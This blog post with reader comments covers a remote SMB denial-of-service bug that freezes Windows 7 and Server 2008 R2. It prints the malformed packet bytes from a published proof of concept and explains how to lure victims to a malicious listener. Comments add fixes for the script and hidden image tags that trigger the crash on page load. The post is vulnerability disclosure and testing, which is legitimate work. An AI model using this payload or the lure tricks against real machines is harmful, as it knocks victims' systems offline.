Remote SMB Exploit: Crashing Windows 7 and Server 2008

pc_guy

Python code was posted today by Laurent Gaffie on his blog, demonstrating a much too easy way to remotely crash a Windows 7 or Windows Server 2008 machine. The crash is caused by sending a NetBIOS header which specifies that the SMB packet is 4 bytes smaller or larger than it actually is.

In this code sample below, you can see that the header has the length of the packet set to 9a rather than 9e (4 bytes smaller). Update: We have tested with different variations, such as 1 byte and 2 bytes off, which also caused the crash.

packet = "\x00\x00\x00\x9a" # --> length should be 9e not 9a.. 
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"

We also tested this by setting 9e to aa (4 bytes larger) to see if it had the same affect and it indeed it did.

A little about the “crash”. The Operating System actually freezes. There is no error message, no blue screen of death, no indication that anything has gone wrong. Even after power cycling, the event logs show no sign of a mishap, aside from the typical events generated from booting up again.

Demonstration

Our victim targets are:

  1. A Windows 7 Professional workstation with latest patches.
  2. A Windows Server 2008 R2 Standard Core Edition with latest patches.

On Open BSD, Mac OSX, and Linux 2.6 workstations, we ran the python code and had it listen on port 445.  I would have had a Windows server run the listening server, but SMB on Windows already listens on port 445 and for the purpose of the demonstration it was easier to run it on machines that do not listen on this port by default.  From the Windows 7 and Windows Server 2008 victim machines, we simply attempt any type of SMB connection to the bad hosts listening with the Python code. This can be done by simply doing a directory command (dir) to a non-existent share (dir \\ip-address\share).

The screenshot below shows the command window with the dir command used to attempt a connection to a host (172.17.20.139) which is running the Python code, ready to send that SMB packet over. As soon as the connection is attempted, the whole machine freezes. I had resource monitor and task manager running and every counter, even the ticking of uptime, stopped dead. In some cases, I left the machine in this state for a significant amount of time.  Also, the host was no longer pingable, so once the crash occurred, it was off the network and no longer attempting any more SMB traffic.

What is the big deal?

To simulate how an attacker could use this, we hosted a small internal web page, with a simple link to direct the user to our malicious host. Now, as seen in the image below, our link was very obvious for demonstration purposes, users can be redirected in various obfuscated ways.  Although remote elevated privileges or sensitive data theft is not part of this proof of concept, this can still be a very troublesome issue.


References

Update

Microsoft says this is being investigated as a possible denial of service vulnerability, but initially responded that correcting it will be handled in the first service pack updates for Windows 7 and Server 2008 R2 rather then as a "Patch Tuesday" security update.

Microsoft has posted a security advisory (977544) regarding the issue.

Filed Under: Remote ExploitWindows

Tags: , , ,

Comments (25)

Trackback URL | Comments RSS Feed

  1. MS_Guy says:

    This is typical of the bash MS crowd! And why would you surf the net from a production server anyway! Oh the sky is falling, the sky is falling!

  2. n0neXn0ne says:

    “And why would you surf the net from a production server anyway!”

    To download patches on Tuesday!

    ^o^

  3. Simon Price says:

    To MS_GUY: I have been a big proponent of Windows 7, having used it since early betas (2008 as well, see my post on using the CLI in Core edition). I was sad to have to write this post, however, this is a pretty significant miss in testing on Microsoft’s part. You likely would not surf from Windows 2008, but you would indeed from Windows 7. For enterprise environments, the lesson here is to keep tight EGRESS rules as well, blocking everything outbound except the essentials (HTTP, HTTPS). The lesson for me is not to tout how wonderful the OS is until the first SP is released. :)

  4. Sebastian says:

    I tried it and didn’t work.

    Is it something special that has to be enabled in either win 7/2k8r2?

  5. Simon Price says:

    Sebastion: Nothing special has to be enabled, the default installation is prone to the crash. Note that the full code is on Laurent’s site, but if you do a cut and paste from there, you may have to fix some of the tabs (Python cares about the tabbing). Ensure that the line def handle is indented, and the five lines under that indented twice. The last two lines are not indented. Also, the code must run on a machine that does not have port 445 in use, so if you run the server on Windows, you have to stop the Server service and disable Netbios. Once you attempt to connect with ‘dir’ as mentioned in the post, complete freeze.

  6. [...] SMB уязвимость, о которой уже шла речь в начале сентября, подтвердилась на релизах Windows 7 и Server 2008 R2.  Подробнее смотрите здесь и здесь. [...]

  7. [...] this exploit; interested folks can find more by Simon Price in his Praetorian Prefect post here or in this post in the SANS Diary by Rob [...]

  8. [...] appena ho tempo, ma comincio a segnalarvi un po’ di fonti: lo spiegone dello scopritore, il test, l’articolo di ZDNet, l’advisory di Microsoft. Chiudete le porte TCP da 135 a 139 e la [...]

  9. [...] Crash, come viene chiamato. Eccovi la spiegazione dello scopritore G.Laurent, mentre sul sito di Praetorian Perfect potete trovare una spiegazione di come inchiodare una macchina in remoto. Ecco, in gergo tecnico, [...]

  10. nckuhuahua says:

    You can simply place a

    image

  11. nckuhuahua says:

    You can simply place a

    image

    <img alt=”" src=”\\ip-address\1.png” height=”1″ width=”1″>

    <img alt=”" src=”file://///ip-address/1.png” height=”1″ width=”1″>

  12. nckuhuahua says:

    That is

    <img alt=”" src=”\\ip-address\1.png” height=”1″ width=”1″>

    <img alt=”" src=”file://///ip-address/1.png” height=”1″ width=”1″>

  13. [...] diversa da quella reale. E’ sufficiente un singolo byte di differenza, secondo i test di PraetorianPrefect.com. Se succede, l’unica cosa che si può fare è premere il pulsante di spegnimento del computer [...]

  14. [...] diversa da quella reale. E’ sufficiente un singolo byte di differenza, secondo i test di PraetorianPrefect.com. Se succede, l’unica cosa che si può fare è premere il pulsante di spegnimento del computer [...]

  15. [...] diversa da quella reale. E’ sufficiente un singolo byte di differenza, secondo i test di PraetorianPrefect.com. Se succede, l’unica cosa che si può fare è premere il pulsante di spegnimento del computer [...]

  16. [...] lunghezza diversa da quella reale. E' sufficiente un singolo byte di differenza, secondo i test di PraetorianPrefect.com. Se succede, l'unica cosa che si può fare è premere il pulsante di spegnimento del computer e poi [...]

  17. [...] on those items, but I haven’t thought of a reason to use them yet. Maybe we can convert Gaffie’s Python code that crashes Windows 7 into a Powershell script one [...]

  18. [...] diversa da quella reale. E’ sufficiente un singolo byte di differenza, secondo i test di PraetorianPrefect.com. Se succede, l’unica cosa che si può fare è premere il pulsante di spegnimento del computer [...]

  19. [...] can crash Windows 7 and Server 2008 R2 will not be patched in January’s patch Tuesday. We have shown how this bug can cause a severe halt to the OS, however, Microsoft stated that they “are not [...]

  20. [...] announced in a blog post that the SMB bug which can crash Windows 7 and Server 2008 R2 will not be patched in January’s patch Tuesday. We have shown how this bug can cause a severe [...]

  21. [...] announced in a blog post that the SMB bug which can crash Windows 7 and Server 2008 R2 will not be patched in January’s patch Tuesday. We have shown how this bug can cause a severe [...]

  22. [...] Remote SMB Exploit: Crashing Windows 7 and server 2008 – praetorianprefect.com [...]

  23. [...] Back on November 11th, 2009 we confirmed Laurent Gaffié’s remote exploit for Windows that causes a kernel crash. The operating system actually freezes creating a denial of service when, for example, a user is tricked into clicking on a link on a web page to a malicious SMB share request. The SMB client goes into an infinite loop when processing this malformed request according to Microsoft. The video below demonstrates this effect, having a user click a web site link and showing the crash. [...]